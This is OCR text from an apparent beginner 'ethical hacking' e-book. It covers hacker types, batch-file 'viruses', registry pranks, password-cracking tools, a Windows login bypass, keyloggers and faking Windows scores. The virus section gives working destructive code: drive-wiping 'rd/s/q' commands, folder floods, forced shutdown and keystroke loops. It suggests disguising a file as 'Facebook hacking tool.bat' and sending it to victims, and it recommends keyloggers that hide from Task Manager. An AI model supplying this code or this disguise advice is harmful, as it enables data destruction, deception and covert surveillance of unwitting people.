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WHY YOU MAY, NOT LIKE NEW 


FIND OUT MORE STUFF 
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TheBigComputing.coi 


We cover unique Ethical Hacking and 
Performance improvement guides, 
News and Tutorials. Our aim is to make 
your digital life easy, pleasant and 


secure. Ujjwal isa regular 
author and also chief security 
administrator at the place, 
you can get solution of your 
queries 


LEGAL 
DISCLAIMER 


Any proceedings or activities 
regarding the material 
contained within this volume 
are exclusively your liability. 
The misuse and mistreat of 
the information/tutorial in this 
book can consequence in 
unlawful charges brought 
against the persons in 
question. The authors and 
review analyzers will not be 
held responsible in the event 
any unlawful charges brought 
against any individuals by 


misusing the information in 
this book to break the law. 
This book contains material 
and resources that can be 
potentially destructive or 
dangerous. If you do not fully 
comprehend something on 
this book, don‘t study this 
book. Please refer to the laws 
and acts of your state/region/ 
province/zone/territory or 
country before accessing, 
using, or in any other way 
utilizing these resources. 


These materials and resources 
are for educational and 
research purposes only. Do 
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with anything enclosed here 
within. If this is your 
intention, then leave now. 
Neither writer of this book, 
review analyzers, the 
publisher, nor anyone else 
affiliated in any way, is going 
to admit any responsibility 
for your proceedings, actions 
or trials. 
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PREFACE 


Computer hacking 15 the 
practice of altering computer 
hardware and software to 
carry out a goal outside of the 
creator‘s original intention. 
People who slot in computer 
hacking actions and activities 
are often entitled as hackers. 
The majority of people 
assume that hackers are 
computer criminals. They fall 


short to identify the fact that 
criminals and hackers are two 
entirely unrelated things. 
Hackers in realism are good 
and extremely intelligent 
people, who by using their 
knowledge ш a constructive 
mode help organizations, 
companies, government, etc. 
to secure credentials and 
secret information on the 
Internet. Years ago, no one 
had to worry about Crackers 
breaking into their computer 


and installing Trojan viruses, 
or using your computer to 
send attacks against others. 
Now that thing have changed, 
it's best to be aware of how to 
defend your computer from 
damaging intrusions and 
prevent black hat hackers. So, 
in this Book you will uncover 
the finest ways to defend your 
computer systems from the 
hackers This Book is written 
by keeping one object in 
mind that a beginner, who 15 


not much familiar regarding 
computer hacking, can easily, 
attempts these hacks and 
recognize what we are trying 
to demonstrate. After 
Reading this book you will 
come to recognize that how 
Hacking is affecting our 
everyday routine work and 
can be very hazardous in 
many fields like bank account 
hacking etc. Moreover, after 
carrying out this volume in 
detail you will be capable of 


understanding that how a 
hacker hacks and how you 
can defend yourself from 
these threats. 


FOR ANY QUERIES AND 
SUGGESTIONS FEEL 
FREE TO CONTACT ME: 
ujjwal@thebigcomputing.com 


In The Loving 
Memory of my DAD 


Your hands so warm 

Your voice so clear 

I still remember your laughter 
Like yesterday had never 
gone I miss your words of 
encouragement Words that 
kept me hanging on Now you 
are gone 

The tears keep flowing Only 
hoping 

That one day the pain will 
fade Dad why did you have to 
go away We love you and 
miss you I know I will again 


see you someday 
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FOOLISH 
ASSUMPTIONS... 


I make a few assumptions 
about you: 

You’re familiar with basic 
computer-, networking— 
related concepts and terms. 

You have a basic 
understanding of what 
hackers and malicious users 
do. 

You have access to a 
computer and a network on 
which to use these 
techniques. 

You have access to the 


Internet to obtain the various 
tools used in the ethical 
hacking process. 

You have permission to 
perform the hacking 
techniques described in this 
book. 
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INTRODUCTIO 


INTRODUCTION 
TO HACKERS 


First of all before digging into 
intense hacking processes 
let’s take a look on what 
hacking 1s, who the hackers 
are, what are their intentions, 


types of hackers and their 
communities etc. 


Communities of Hackers: 


HACKERS 
CRACKERS 
PHREAKS 
SCRIPT KIDDIES 


HACKERS are the Intelligent 
Computer Experts. 
INTENSION OF HACKERS: 


*To gain in-depth knowledge 
of any computer system, what 
is happening at the backend 
of any specific program of the 
system behind the screen of 
the computer system? 


* Their motive is to find 
possible security risk and 
vulnerabilities in a computer 
system or network. 


*They create security 
awareness among the people 


by sharing knowledge and 
proper security preventions 
that should be taken by the 
user. 


Types of Hackers: 


*White Hat Hackers “һе 
hats" is the name used for 
security experts. While they 
often use the same tools and 
techniques as the black hats, 
they do so in order to foil the 
bad guys. That is, they use 


those tools for ethical hacking 
and computer forensics. 
Ethical hacking is the process 
of using security tools to test 
and improve security (rather 
than to break it!). Computer 
forensics is the process of 
collecting evidence needed to 
identify and convict computer 
criminals. 


«Black Hat Hackers -They 
use their knowledge and skill 
set for illegal activities and 


destructive intents. 
Obviously, the “black hats” 
are the bad guys. These are 
the people who create and 
send viruses and worms, 
break into computer systems, 
steal data, shut down 
networks, and basically 
commit electronic crimes. We 
talk about black hats at 
several points in this book. 
Black hat hackers and 
malware writers are not 
considered as the same thing 


in the security community— 
even though they are both 
breaking the law. 


*Отеу Hat Hackers They use 
their knowledge and skill set 
for the legal and illegal 
purpose. They are white hats 
in public but internally they 
do some black hat work. Gray 
hats sit in the middle of the 
fence because sometimes they 
cross that ethical line (or 
more often, define it 


differently). For example, 
gray hats will break into a 
company’s computer system 
just to wander around and see 
what’s there. They think that 
simply because they don’t 
damage any data, they’re not 
committing a crime. Then 
they go and apply for jobs as 
security consultants for large 
corporations. They justify 
their earlier break-in as some 
sort of computer security 
training. Many really believe 


that they’re providing a 
public service by letting 
companies know that their 
computers are at risk. 


CRACKERS are those who 
break into the applications 
with some malicious 
intentions either for their 
personal gain or their greedy 
achievements. 


Intension of crackers: 
* Their motive is to get 


unauthorized access into a 
system and cause damage or 
destroy or reveal confidential 
information. 

eTo compromise the system 
to deny services to legitimate 
users for troubling, harassing 
them or for taking revenge. 
• can cause financial losses 
& image/reputation damages, 
defamation in the society for 
individuals or organizations. 


PHREAKS are those people 


who use computer devices 
and software programs and 
their tricky and sharp mind to 
break into the phone 
networks. 


Intention of phreaks: 


*To find loopholes in security 
in phone network and to 
make phone calls and access 
internet at free of cost!!! 

You may get a spoofed call 
or a big amount of bill. 


You can also get a call with 
your own number. 


SCRIPT KIDDIES: These are 
computer novices who take 
advantage of the hacker tools, 
vulnerability scanners, and 
documentation available free 
on the Internet but who don’t 
have any real knowledge of 
what’s really going on behind 
the scenes. They know just 
enough to cause you 
headaches but typically are 


very sloppy in their actions, 
leaving all sorts of digital 
fingerprints behind. Even 
though these guys are the 
stereotypical hackers that you 
hear about in the news media, 
they often need only minimal 
skills to carry out their 
attacks. 


Intention of script kiddies: 
*They use the available 
information about known 
vulnerabilities to break into 


the network systems. 

eIt’s an act performed for a 
fun or out of curiosity. 
Black Hat Hackers Strategy: 
eInformation Gathering & 
Scanning 

¢Getting Access on the 
website 

* Maintain the access 

*Сеаг the Tracks 
Conclusion: Security is 
important because prevention 
is better than cure. 


HACKERS 
WANT YOUR 
PC 


HACKERS WANT 
YOUR PC... 


You might be 
thinkingthathackers don’t 
careabout your computer,but 


they do. Hackers want access 
to your system for many 
different reasons. Remember, 
once a hacker breaks in and 
plants a Trojan, the door is 
open for anyone to return. 
The hackers know this and 
are making money off from 
it. They know it’s easy to 
hide and very difficult to 
track them back once they 
own your PC. 


Overall, the Internet is an 


easy place to hide. 
Compromised computers 
around the world have helped 
to make hiding simple. It is 
easy to find the last IP 
address from where an attack 
was launched, but hackers 
hop from many unsecured 
systems to hide their location 
before they launch attacks. 


IP address is a unique address 
that identifies where a 
computer is connected to the 


Internet. Every computer, 
even yours if you’re using 
broadband access, has an 
Internet protocol (IP) address. 


Over the past four years, most 
cyber-attacks have been 
launched from computers 
within the INDIA. However, 
this doesn't mean that 
systems in the INDIA are the 
original source of the attack. 
A hacker in Pakistan could 
actually use your computer to 


launch a denial of service 
(DOS) attack. To the entire 
world, it might even look as if 
you Started the attack because 
the hacker has hidden his 
tracks so that only the last 
“hop” can be traced 


VIRUS CREATIONS 


CREATION OF VIRUS IN 
NOTEPAD 


Now, it’s time to administrate 


your computer by creating 
some viruses in the form of 
batch file. You can create 
various types of viruses with 
havingdistinct functionality. 
Eachandeveryviruswill affect 
thevictim’s computer system 
by the way you have coded 
its programming in the batch 
file. You can create viruses 
which can freeze the victim’s 
computer or it can also crash 
it. 


Virus creation codes of the 
batch file:- 

--Codes to be written ш the 
notepad- 

--Extension of the files 
should be ".bat" - 


1.) To create a huge amount 
of folders on victim's desktop 
screen: 

First of all your task is to 
copy the following codes in 
the notepad of your computer. 
For opening the notepad: 


Go to run option of your 
computer by pressing 
“window+R”. Simply type 
“notepad” and click on the 
OK option. 


= Run 53 


Type the пате of a program, folder, document, or 
— Internet resource, and Windows will open it for you. 


Open: notepad v 


OK Cancel Browse... 


CODES: @echo off 


Дор 
md%random% 
goto top. 


FacebookHackingTool - Notepad ә | 15 | 


@echo off 

Хор 

md %random% 
goto top 


Ln 1, Col 1 


Now when you have copied 
the codes in the notepad your 
next work is to save the text 


document you have created. 
Go to fileoptionandsave your 
document by any 
namebut'don' tforget to keep 
the extension as ‘.bat’. 


For example you can save 
your text document by the 
name“ujjwal.bat” 


Or you can also keep your 
document name as “Facebook 
hacking tool.bat" to confuse 
the victim and enforce him to 


open the virus you have 
created to destroy the desktop 
of the victim. 


Save As 


@ лет! 
4. Music 
5, Pict Computer 
8 video 
^ 47 Network 
le name: | FacebookHackingTool.bat 
S type: All Files 
Hide F Encoding: ANSI v Save Cancel 


When you have done saving 
the document just double 


click on the batch file to open 
it. 


suddenly you will see that the 


command prompt of the 
victim’s computer opened 
automatically and it will 
display large amount of codes 
to running in the command 
prompt. 

After 5-10 seconds you will 
see that there are a huge 
amount of folders created 
automatically on the desktop 
of the victim and it will also 
leads the desktop to freeze or 
crash. 


2.) To create more folders in 
C, D, and E drive of victim’s 
computer:- 


As we have learned above to 
create many folders on the 
desktop of the victim, in the 
same way we can create a lot 
of folders in the C:, D:, and 
E: drives of the victims 
computer by applying the 
same method as we have 
followed above but there is a 
little amendment in the codes 


of the batch file of this virus. 


CODES: 
@echo off 


: VIRUS 

cd /d C: 
md%random™% 
cd /d D: 
md%random% 
cd /d E: 
md%random™% 
goto VIRUS 


Copy and paste the above 
code in the notepad and 
follow the same steps as we 
have followed before to 
create more numbers of 
folders in the local drives of 
the victim’s computer. 


3.) To format C, D: and E: 
drive of your computer: 


Open Notepad 
Copy the below command 
there 


"rd/s/q D^ 

rd/s/q C^ 

rd/s/q E:\" (Without quotes) 
Save as "anything.bat 


Double click on the virus 
icon. 

This virus formats the C, D 
and E Drive in 5 Seconds. 

4.) Convey your friend a little 
message and shut down his / 
her computer: 


@echo off 


msg * I don't like you 
shutdown -c "Error! You are 
too stupid!" -s 


Save it as "Anything.BAT" in 
All Files and send it. 


5.) Open Notepad, slowly type 
"Hello, how are you? I am 
good thanks" and freak your 
friend out: 


Open the notepad and type 
the following code : 


WScript.Sleep 180000 
WScript.Sleep 10000 

Set WshShell — 
WScript.CreateObject(" WSeri 
WshShell.Run "notepad" 
WScript.Sleep 100 
WshShell.AppActivate 
"Notepad" 

WScript.Sleep 500 
WshShell.SendKeys "Hel" 
WScript.Sleep 500 
WshShell.SendKeys "lo " 
WScript.Sleep 500 
WshShell.SendKeys ", ho" 


WScript.Sleep 500 
WshShell.SendKeys "w a" 
WScript.Sleep 500 
WshShell.SendKeys "re " 
WScript.Sleep 500 
WshShell.SendKeys "you" 
WScript.Sleep 500 
WshShell.SendKeys "? " 
WScript.Sleep 500 
WshShell.SendKeys "I a" 
WScript.Sleep 500 
WshShell.SendKeys "m g" 
WScript.Sleep 500 
WshShell.SendKeys "ood" 


WScript.Sleep 500 
WshShell.SendKeys " th" 
WScript.Sleep 500 
WshShell.SendKeys "ank" 
WScript.Sleep 500 
WshShell.SendKeys "s! " 


Save it as "Anything. VBS" 
and send it. 

6.) Hack your friend's 
keyboard and make him type 
"Y ou are a fool" 
simultaneously: 

Open the notepad and type 


the following codes: 


Set wshShell = 
wscript.CreateObject("WScrit 
do 

wscript.sleep 100 
wshshell.sendkeys "You are a 
fool." 

loop 


Save it as "Anything. VBS" 
and send it. 

7.) Open Notepad continually 
in your friend's computer: 


Open the notepad and type 
the following codes: 

@ECHO off 

Дор 

START 
%SystemRoot%\system32\not 
GOTO top 


Save it as "Anything. BAT" 
and send it. 

8.) THRETEN YOUR 
FRIEND BY MAKING 
SCREEN FLASH 


To make a really cool batch 
file that can make your entire 
screen flash random colors 
until you hit a key to stop it, 
simply copy and paste the 
following code into notepad 
and then save it as a .bat file. 


@echo off 

echo e100 B8 13 00 CD 10 
E4 40 88 C3 E4 40 88 C7 F6 
E3 30>\z.dbg echo e110 DF 
88 C1 BA C8 03 30 СО EE 
BA DA 03 EC A8 08 


75>>\z.dbg echo e120 FB EC 
A8 08 74 FB BA C9 03 88 
D8 EE 88 F8 EE 88>>\z.dbg 
echo e130 C8 EE B4 01 CD 
16 74 CD B8 03 00 CD 10 
C3>>\z.dbg echo 
e=100>>\z.dbg 

echo q>>\z.dbg 

debug <\z.dbg>nul 

del \z.dbg 


But if you really want to mess 
with a friend then copy and 
paste the following code 


which will do the same thing 
except when they press a key 
the screen will go black and 
the only way to stop the batch 
file is by pressing CTRL- 
ALT-DELETE. 

Codes: 


@echo off :a echo e100 B8 
13 00 CD 10 E4 40 88 C3 E4 
40 88 C7 F6 ЕЗ 30>\z.dbg 
echo e110 DF 88 Cl BA C8 
03 30 CO EE BA DA 03 EC 
А8 08 75>>\z.dbg echo e120 


FB EC A8 08 74 FB BA C9 
03 88 D8 EE 88 F8 EE 
88>>\z.dbg echo e130 C8 EE 
B4 01 CD 16 74 CD B8 03 
00 CD 10 C3>>\z.dbg echo 
e=100>>\z.dbg 

echo q>>\z.dbg 

debug <\z.dbg>nul 

del \z.dbg 

goto a 


To disable error 
(ctrl+shirt+esc) then end 
process wscript.exe Enjoy!!! 


Note: - some of the above 
given codes can harm your 
computer after execution so; 
don’t try it on your pc. You 
can use a test computer for it. 


BATCH TO 
EXE 
CONVERSION 


Convert Batch files 
into Executable 
Programs 


The batch files and the 
executable files work in 


almost similar way. Basically 
both are as much as a set of 
instructions and logics for the 
command execution. But 
more preferably we treat 
executable files as they are 
more convenient than batch 
one. 


But why would we want that? 

Some of the reasons are listed 
below: 

1. We can include extra tools 
in our EXE dependent batch 


file. 


2. Moreover EXE provides 
protection to the source script 
to restrict modification. 

3. EXE files can be pinned to 
windows start menu as well 
as in the task bar. 

Here weare usinga tool 
called“Batchtoexe converter” 
whichprovides you a platform 
to run the batch files as 


executable files. 
You can download it from here 
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“Bat to ExeConverter” is a 
flow conversionprogram 
whose purpose is to help you 
to easily obtain executable 
files out of batch items. 

If you prefer to convert a 
BATCH file into an 
executable one easily, “Bat to 
ExeConverter" is a simple 
and yet effective solution. 


The application provides you 
with a simplified interface, 
which makes it comfortable 


for both beginner and 
advanced users. From its 
primary window, you have 
the ability to select the 
desired batch file and output 
file. Then, you will be able to 
customize your settings 
according to your choice and 
preferences. 


Another interesting and 
compactible feature 1$ that 
you can choose the language 
for your EXE file, the choices 


being English or German. 
From the Options tab, users 
can opt to create a visible or 
invisible application, which 
means displaying a console 
window or not. However, if 
you want to encrypt the 
resulting EXE file, you can 
protect it with a security 
password. 


MESSING UP 
WITH 
REGISTRY 


HACKING “OPEN” 
OPTION 


If we want to open any folder 
either we use to double click 
on the folder or we just right 


click on the folder and it will 
show us a dialogue box with 
OPEN option at the top of the 
dialogue box. 


Andtodaywe are goingto 
learn thathow to hackthe 
“OPEN” option by any text 
by which you want to replace 
It. 

STEPS: 

Go to “run” option and type 
"regedit" and click on ok. 
Note: “regedit” stands for 


registry editing. 


Registry: - it is responsible 
for saving the binary 
equivalent working of every 
application in operating 
system. 


r 
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zy Type the name of a program, folder, document, or 
— Internet resource, and Windows will open it for you. 


Open: regedit v 


OK Cancel Browse... 


Then a window will open in 
front of you of registry 
editing. It has five options. 


1. НКЕУ CLASSES ROOT 
2. HKEY CURRENT USER 
3. 

HKEY LOCAL MACHINE 
4. HKEY USERS 

5. 

HKEY CURRENT CONFIG 


Then you have to click on 
"HKEY CLASSES ROOT” 
It will open and you see a lot 
of items under it. 

Search for the “FOLDER” 


option under it. 
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Forms HTMLTextArea.1 
Forms.image.1 

Forms.Label.1 

Forms ListBox.1 v 
< > 


Computer\HKEY_CLASSES ROOT\Folder 


рр р р 4 2 0 2.2 1 1 11 11 14 114 6 4 4 d d.d 


Click on the folder option to 
open it. 

When you open folder option 
you will see the "SHELL" 


option. By opening the 
"SHELL" option you will see 
the “OPEN” option under it. 
Just give a single click on the 
open option instead opening 
it You will see two items 
defined in the left white 
workspace. 


File Edit View Favorites Help 
|. FlashGetBHO.FlashGetAPP.1 ^ || Name Type Data 
|. FlashGetHookFG3DownMgr aU (Default) REG SZ 
+ FlashGetHook.FG3DownMgr.1 
|. FlashProp.FlashProp 


»"|MultiSelect. REG SZ Document t 


|. FlashProp.FlashProp.1 
JL FlashVideo.FlashVideo 


Just open the “Default” 
string (1% option). 

Do not touch the value name. 
Type anything by which 

you want to replace your 
"open" option. 


For example I am typing here 
that “your computer is hacked 
by Ujjwal Sahay”. 


s Registry Editor 


+ FlashGetBHO.FlashGetAPP.1 A | Name Туре Data 
А FlashGetHookFG3DownMgr ab (Default) REG SZ 


Then click on ok option. 
Now go on any folder and 
just give a right click to it. 


Woooooo! Now the open 
option is changed by the text 
"your computer is hacked by 


Ujjwal Sahay”. 


PASSWORD 
CRACKING 
EXPLAINED 


PASSWORD 
CRACKING 


Password crackers are the 
most famous and elementary 
tools in the hacker’s toolbox. 


These have been around for 
some time and are fairly 
effective at “guessing” most 
users’ passwords, at least in 
part because most users do a 
very poor job of selecting 
secure passwords. 


First of all if a hacker is going 
to crack your password then 
at the very first step they 
usually try some guesses to 
crack your password. They 
generally made it easy by 


social engineering. Hackers 
know that most users select 
simple passwords that are 
easy to remember. The top 
choices of the users are nearly 
always names that are 
personally meaningful to the 
user—first names of 
immediate family members 
leadthelist,followedby pet’s 
namesand favoritesporting 
teams. Password crackers 
may end up loading full 
English dictionaries, but they 


can hit a fair number of 
passwords with the contents 
of any popular baby name 
book. Other poor password 
selections include common 
numbers and numbers that 
follow a common format such 
as phone numbers and social 
security numbers. 


Compounding the problem, 
many users set the same user 
name and password for all 
accounts, allowing hackers to 


have a field day with a single 
harvested password. That’s 
something to consider before 
you use the same password 
for Facebook as you use at 
school or at work. 

The key to creating a good 
password 15 to create 
something that someone 
cannot guess or easily crack. 
Using your pet’s name 
therefore 1s not a good 
technique. Using your login 
name is also a bad technique 


because someone who knows 
your login (or your name, 
since many login names are 
simply variations on your 
surname), could easily break 
into your system. 


Cracking passwords with 
hardcore tools 


High-tech password cracking 
involves using a program that 
tries to guess a password by 
determining all possible 


password combinations. 
These high-tech methods are 
mostly automated after you 
access the computer and 
password database files. 

The main password-cracking 
methods are dictionary 
attacks, bruteforce attacks, 
and rainbow attacks. You find 
out how each of these work in 
the following sections. 


Password-cracking software: 
You can try to crack your 


organization’s operating 
system and application 
passwords with various 
password-cracking tools: 


Cain & Abel: Cain and Abel 
is a well-known password 
cracking tool that is capable 
of handling a variety of tasks. 
The most notable thing 1$ that 
the tool 15 only available for 
Windows platforms. It can 
work as sniffer in the 
network, cracking encrypted 


passwords using the 
dictionary attack, brute force 
attacks, cryptanalysis attacks, 
revealing password boxes, 
uncovering cached 
passwords, decoding 
scrambled passwords, and 
analyzing routing protocols. 
It use to cracks LM and NT 
LanManager (NTLM) hashes, 
Windows RDP passwords, 
Cisco IOS and PIX hashes, 
VNC passwords, RADIUS 
hashes, and lots more. 


(Hashes are cryptographic 
representations of 
passwords. ) 


Brutus: Brutus is one of the 
most popular remote online 
password cracking tools. It 
claims to be the fastest and 
most flexible password 
cracking tool. This tool is free 
and is only available for 
Windows systems. It was 
released back in October 
2000. 


It supports HTTP (Basic 
Authentication), HTTP 
(HTML Form/CGI), POP3, 
FTP, SMB, Telnet and other 
types such as IMAP, NNTP, 
NetBus, etc. You can also 
create your own 
authentication types. This 
tool also supports multi-stage 
authentication engines and is 
able to connect 60 
simultaneous targets. It also 
has resumed and load options. 
So, you can pause the attack 


process any time and then 
resume whenever you want to 
resume. 


Elcomsoft Distributed 
Password Recovery: 


(www.elcomsoft.com/edpr.htr 
cracks Windows, Microsoft 
Office, PGP, Adobe, iTunes, 
and numerous other 
passwords 1п a distributed 
fashion using up to 10,000 
networked computers at one 


time. Plus, this tool uses the 
same graphics processing unit 
(GPU) video acceleration as 
the Elcomsoft Wireless 
Auditor tool, which allows 
for cracking speeds up to 50 
times faster. 


Elcomsoft System Recovery: 


(www.elcomsoft.com/esr.html) 
cracks Or resets Windows 
user passwords, sets 
administrative rights, and 
resets password expirations 


all from a bootable CD. 


John the Ripper : - 
(www.openwall.com/john) 
John the Ripper is another 
well-known free open source 
password cracking tool for 
Linux, UNIX and Mac OS X. 
A Windows version is also 
available. This tool can detect 
weak passwords. A pro 
version of the tool is also 
available, which offers better 
features and native packages 


for target operating systems. 


ophcrack : 
(http://ophcrack.sourceforge.n 
cracks Windows User 
passwords using rainbow 
tables from a bootable CD. 
Rainbow tables are pre- 
calculated password hashes 
that can help speed up the 
cracking process. 


Aircrack-NG : - 
(http://www.aircrack-ng.org/) 


Aircrack-NG 15 a WiFi 
password cracking tool that 
can crack WEP or WPA 
passwords. It analyzes 
wireless encrypted packets 
and then tries to crack 
passwords via its cracking 
algorithm. It is available for 
Linux and Windows systems. 
A live CD of Aircrack is also 
available. 


Proactive System Password 
Recovery 


(www.elcomsoft.com/pspr. 
html) recovers practically any 
locally stored Windows 
password, such As logon 
passwords, WEP/WPA 
passphrases, SYSKEY 
passwords, and 
RAS/dialup/VPN passwords. 


Rainbow Crack : - 
(http://project- 
rainbowcrack.com) Rainbow 


Crack is a hash cracker tool 
that uses a large-scale time- 
memory trade off process for 
faster password cracking than 
traditional brute force tools. 
Time-memory tradeoff is a 
computational process in 
which all plain text and hash 
pairs are calculated by using a 
selected hash algorithm. After 
computation, results are 
stored in the rainbow table. 
This process is very time 
consuming. But, once the 


table is ready, it can crack a 
password must faster than 
brute force tools. 

You also do not need to 
generate rainbow tablets by 
yourselves. Developers of 
Rainbow Crack have also 
generated LM rainbow tables, 
NTLM rainbow tables, MD5 
rainbow tables and Shal 
rainbow tables. Like Rainbow 
Crack, these tables are also 
available for free. You can 
download these tables and 


use for your password 
cracking processes. 


pwdump3 :- 
(www.openwall.com/passwort 
2000-xp-2003-vista- 
7#pwdump) password hashes 
from the SAM (Security 
database. 

extracts Accounts Windows 
Manager) 


Password storage locations 
vary by operating system: 


Windows usually stores 
passwords in these locations: 


* Active Directory database 
file that’s stored locally or 
spread across domain 
controllers (ntds.dit) 
Windows may also store 
passwords in a backup of the 
SAM file in the 
c:\winnt\repair or 
c:\windows\repair directory. 


e Security Accounts Manager 


(SAM) database (c:\winnt\ 
system32\config) or 
(c:\windows\system32\config) 


Some Windows applications 
store passwords in the 
Registry or as plaintext files 
on the hard drive! A simple 
registry or file-system search 
for “password” may uncover 
just what you’re looking for. 


Linux and other UNIX 
variants typically store 


passwords in these files: 

e /etc/passwd (readable by 
everyone) 

e /etc/shadow (accessible by 
the system and the root 
account only) 

e /.secure/etc/passwd 
(accessible by the system and 
the root account only) 

* /etc/security/passwd 
(accessible by the system and 
the root account only) 


MUST HAVE 
PASSWORD 
POLICIES 


PASSWORD 
CREATING 
POLICIES 


As an ethical hacker, you 
should show users the 


importance of securing their 
passwords. Here are some 
tips on how to do that: 


Demonstrate how to create 
secure passwords:-generally 
people use to create their 
passwords using only words, 
which can be less secure. 


Show what can happen when 
weak passwords are used or 
passwords are shared. 
Diligently build user 


awareness of social 
engineering 
attacks:Encourage the use of 
a strong password-creation 
policy that includes the 
following criteria: 

Use punctuation characters 
to separate words. 


Use upperand lowercase 
letters, special characters, and 
numbers. 

Never use only numbers. 
Such passwords can be 


cracked quickly. 


Change passwords every 15 
to 30 days or immediately if 
they’re suspected of being 
compromised. 


Use different passwords for 
each system. This is 
especially important for 
network infrastructure hosts, 
such as servers, firewalls, and 
routers. 

It’s okay to use similar 


passwords — just make them 
slightly different for each 
type of system, such as 
wweraw/77-Win7 for 
Windows systems and 
wweraw453 for Linux 
systems. 


Use variable-length 
passwords. This trick can 
throw off attackers because 
they won’t know the required 
minimum or maximum length 
of Passwords and must try all 


password length 
combinations. 


Don’t use common slang 
words or words that are in a 
dictionary. 


Don’t rely completely on 
similar-looking characters, 
such as 3 instead of E, 5 
instead of S, or / Instead of /. 
Password-cracking programs 
can for this. 


Use password-protected 
screen savers. Unlocked 
screens are a great way for 
systems to be compromised 
even if their hard drives are 
encrypted. 


Don't reuse the same 
password within at least four 
to five password changes. 
Don’t share passwords. To 
each his or her own! 


Avoid storing user 


passwords in an unsecured 
central location, such as an 
unprotected spreadsheet on a 
hard drive. This is an 
invitation for disaster. Use 
Password Safe or a similar 
program to store user 
passwords. 


KONBOOT 


BYPASS WINDOWS 
LOGON SCREEN 
PASSWORD 


Sometimes it creates a critical 
condition if you forgot your 
Windows administrator 
password and it’s quite urgent 
to recover it without any 


flaw. This article will make it 
convenient to recover your 
admin password. 


We are using a tool named as 
KON-BOOT. 


Kon-Boot is an application 
which will bypass the 
authentication process of 
Windows based operating 
systems. It enables you login 
in to any password protected 
test machine without any 


knowledge of the password. 


Kon-Boot works with both 
64-bit and 32-bit Microsoft 
Windows operating systems. 


Needy things: — 

A Pen Drive or Any USB 
Device such as Memory Card 
or a blank CD. Kon-Boot 
(Latest version) 

Your 5 minutes and also a 
working mind. 


Technical instructions: — 

1. Download KON-BOOT 
from internet. 

2. Extract the ZIP and run the 
“K onBootInstaller.exe”’ 

3. Burn the ISO. 

4. Boot from CD/USB 
device. 

5. After Windows 15 loaded it 
will show you a Kon-boot 
screen. 


6. Leave the password box 
empty and just hit OK it will 


directly enable you into the 
windows account. 
Limitations: 

IT MAY CAUSE BSOD 
(NOTEPAD PARTICULAR 
BUGS). 


KEYLOGGERS 


KEYSTROKE 
LOGGING 


One of the best techniques for 
capturing passwords is 
remote keystroke logging — 
the use of software or 
hardware to record keystrokes 


as they’re typed into the 
computer. 


Generally you use to ask your 
friends or relatives for 
logging in into your account 
by their computers. 


So, be careful with key 
loggers installed ш their 
computers. Even with 
goodintentions, 
monitoringemployees raises 
various legal issues if it’s not 


done correctly. Discuss with 
yourlegal counsel what you’ll 
be doing, ask for their 
guidance, and get approval 
from upper management. 


Logging tools: - With 
keystroke-logging tools, you 
can assess the log files of 
your application to see what 
passwords people are using: 
Keystroke-logging 
applications can be installed 
on the monitored computer. 


I suggest you to check out 
family key logger by 
(www.spyarsenel.com). 
Another popular tool is 
Invisible Key Logger Stealth; 
Dozens of other such tools 
are available on the Internet. 


One more you can checkout 
is KGB employee monitor is 
one of the favorite of me 
.....Because it is not only 
invisible but it will also not 
shown by your task manager 


and it uses password 
protection too. 


Hardware-based tools, such 
as Key Ghost 
(www.keyghost.com), fit 
between the keyboard and the 
computer or replace the 
keyboard altogether. 

A keystroke-logging tool 
installed on a shared 
computer can capture the 
passwords of every user who 
logs in. 


PREVENTIONS: 


The best defense against the 
installation of keystroke- 
logging software on your 
systems is to use an anti- 
malware program that 
monitors the local host. It’s 
not foolproof but can help. As 
for physical key loggers, 
you'll need to visually inspect 
each system. 


The potential for hackers to 


install keystroke-logging 
software is another reason to 
ensure that your users aren’t 
downloading and installing 
random shareware or opening 
attachments in unsolicited 
emails. Consider locking 
down your desktops by 
setting the appropriate user 
rights through local or group 
security policy in Windows. 


DO YOU HAVE 
RATED 7.9 ? 


Learn How to Hack 
Windows Experience 
Index 


Starting from Windows Vista, 
Microsoft introduced a kind 
of benchmarking system in its 
Operating System. In 


Windows Vista and 7 users 
can rate their PC using the 
Windows Experience Index. 
The Highest possible score in 
Windows Vista is 5 while 
Windows 7 machines can go 
up to 7.9 in the experience 
index. 


In the Windows Experience 
index the base score is based 
on the lowest score of any 
component. Such as in the 
test PC it was 4.4 based 


because of the Graphics sub 
score. 


However it is not so tough to 
manipulate these numbers 
and change these scores 
according to your will. You 
can change these just to fool 
anyone. 


GETTING STARTED 


To make things simplified we 
would recommend you to run 


Windows Experience Index 
first (If you have not done so) 
if you have done that you can 
skip this section. 


To do those open Control 
panels go to System and security 


and then click on Check the 
WindowsExperience Index 


After that click on Rate This 
computer 

Note that your Computer may 
take several minutes in rating 


the system 


You will see a screen similar 
to this. 


Memory (RAM): lemory ор per 59 
6 Desktop perf f idi 44 4 
===: 3D business and gaming graphi 52 Determine d by 
'ormance 
lowest sul bscore 
Primary hard disk: Disk d. f 57 
Vh 
HA PP S system informatic 
* pe 


es 


MESSING UP WITH 
SCORES 

To manipulate these scores 
head to Windows installation 
drive (C: in our case). Then 
go to 


Windows > Performance > WinSAT 


> DataStore 
You will able to see several 
indexing files there. 


You will need to open the file 


ending with “‘Formal.Assessment 
(Initial). WinSAT” 


Open the file in notepad. You 
will see the following 
window: 


10-17 TESE 50-108 Formal Assessment (inital). WinSAT xml - Notepad 


File Edit Format View Help 


I?xml version="1.0" encoding="UTF-16"? 
»«WinSAT»«Programinfo» «Name» WinSAT«/Name» «Version? V6. 1 
Build-7600.16385«/Version» «WinElVersion» Windows7-RC- 
0.91«/WinElVersion? «Title» Windows System Assessment 

Tool«/Title» «ModulePath» C: Windows 
\system32\winsat.exe</ModulePath><CmdLine><![CDATA["C:\Windows 
\system32\winsat.exe" formal -cancelevent fefd58c2-029b-49ff-94b8- 
8fafda0147cc]]» «/CmdLine» «Note» «![CDATA[]] 
></Note></Programinfo><SystemEnvironment><ExecDateTOD 
Friendly="Saturday October 12, 2013 
11:58:50am">735153:43130108</ExecDateTOD><IsOfficial> 1 «/IsOffici 
al><IsFormal/><RanOverTs>0</RanOverls><RanOnBatteries>0</RanO 
nBatteries></SystemEnvironment><WinSPR><SystemScore>4.4</Syst 
emScore><MemoryScore>5.9</MemoryScore><CpuScore>6.7</CpuSc 
ore><CPUSubAggScore>6.4</CPUSubAggScore><VideoEncodeScore> 
6.9</VideoEncodeScore><GraphicsScore>4.4</GraphicsScore><Dx9S 
ubScore>3.8</Dx9SubScore><Dx10SubScore>5.2</Dx10SubScore><G 
